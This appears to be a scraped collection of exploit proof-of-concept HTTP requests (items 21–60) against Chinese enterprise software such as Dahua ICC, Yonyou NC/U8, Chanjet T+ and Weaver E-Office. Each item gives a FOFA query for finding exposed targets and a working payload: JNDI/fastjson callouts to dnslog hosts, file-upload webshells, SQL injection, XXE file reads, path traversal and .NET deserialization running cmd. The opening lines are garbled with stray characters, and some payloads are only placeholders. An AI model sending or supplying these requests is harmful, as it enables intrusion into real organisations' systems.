; \* g( @$ n: t% X' T0 v2 lUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ M6 |. Z+ T' e* B e, x* HConnection: close# W1 Y8 _' z0 X4 p3 q
Accept: */*5 `( r/ A) U! O: ?" P
Accept-Language: en, a* n, U" a* k" ]# E! I# ~
Accept-Encoding: gzip
$ B8 @ C- j0 @
; ^. w" @& z6 }' y$ G/ d# T
$ `' r5 P9 [) b1 P- |7 `( D6 k1 T21. 大华ICC智能物联综合管理平台random远程代码执行" z2 N- m Z- n* t' v
FOFA:icon_hash="-1935899595"
& t( j2 g3 S; o# N" s5 V- JPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1- G* ?2 @# a' T5 |% ?, [
Host: x.x.x.x
' d# L- d' P% W% [; IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- I* ?& v' s! EContent-Length: 161
9 s" b" w0 S. G. u' V# Y& h1 F8 `. _/ l/ EAccept-Encoding: gzip4 P: A4 H( D( N& O* O4 P! L
Connection: close, K& x) |$ N6 X P# c) n' k
Content-Type: application/json;charset=utf-86 M1 e6 X. m# n. l; F1 t
" I# F( m% ^& d{
0 ^7 j. j8 B1 r- A/ I* r% ["a":{- i3 m# H5 i& r2 \
"@type":"com.alibaba.fastjson.JSONObject",6 d6 l* U! u: T/ m2 }' m$ P
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
( u$ w) {+ A& I# T' ^ }""
6 R9 q* I" P9 H2 s' S8 ?! P& I5 v}
' Y8 Y- b9 a! A+ H7 Y1 J# S1 T+ u0 w3 H& c8 g2 a& s
* u6 f& V/ e5 I8 Z4 w& r22. 大华ICC智能物联综合管理平台 log4j远程代码执行6 a, o: c. W5 ]( x. \2 u$ }: R
FOFA:icon_hash="-1935899595"; e& w3 g2 T+ S5 a9 L
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
8 ^/ c% I2 Y! M: SHost: your-ip, a) J/ M5 R5 N1 O' Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* O i- o6 M# I9 BContent-Type: application/json;charset=utf-8
/ E/ w: e! s. H1 r4 O6 y7 B& a6 V1 e+ l
{9 U% D4 }) ~( `% D7 ]+ _: u; D7 O
"loginName":"${jndi:ldap://dnslog}"
9 b( j2 U; R- `% ^# T- @! X/ L}. c# p2 L' o0 t0 ~, L; ^7 {
; u3 T( _: {/ ~' k" E8 V# C9 l' V5 O) G1 L
) i$ _3 s# ~9 t" z3 u23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
, u7 i7 K7 v5 x) C, IFOFA:icon_hash="-1935899595"& p' z% X4 t4 n1 J
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.19 G# g% W2 C& b. G
Host: your-ip6 k7 M2 _- L2 v) b7 c; T' K% f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) [& o1 F% D( G3 ?4 q( n2 ~9 pContent-Type: application/json;charset=utf-8$ O$ d e5 _8 R' k5 ?& x1 V w
Accept-Encoding: gzip9 }. H" j. ] [7 k5 G) L* A+ I
Connection: close
4 @+ c$ u: l5 E( g4 I" {8 i C
; [/ S) G7 ]! z [{4 Y) x7 O% a- _8 s" k
"a":{' ]$ [" I7 m4 {- {( W
"@type":"com.alibaba.fastjson.JSONObject",
: i8 f3 w5 e7 Y7 M! [ {"@type":"java.net.URL","val":"http://DNSLOG"}
% Z0 _& R- o/ P: ^( `& z' k9 n5 n$ D }""
& c6 g9 _% n" Q* K- Z" p}9 Y+ F) e* g1 B$ I) u
* ? v4 n( Y" D4 G
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
<soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3335 |0

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
The sql parameter is base64; c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3.
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
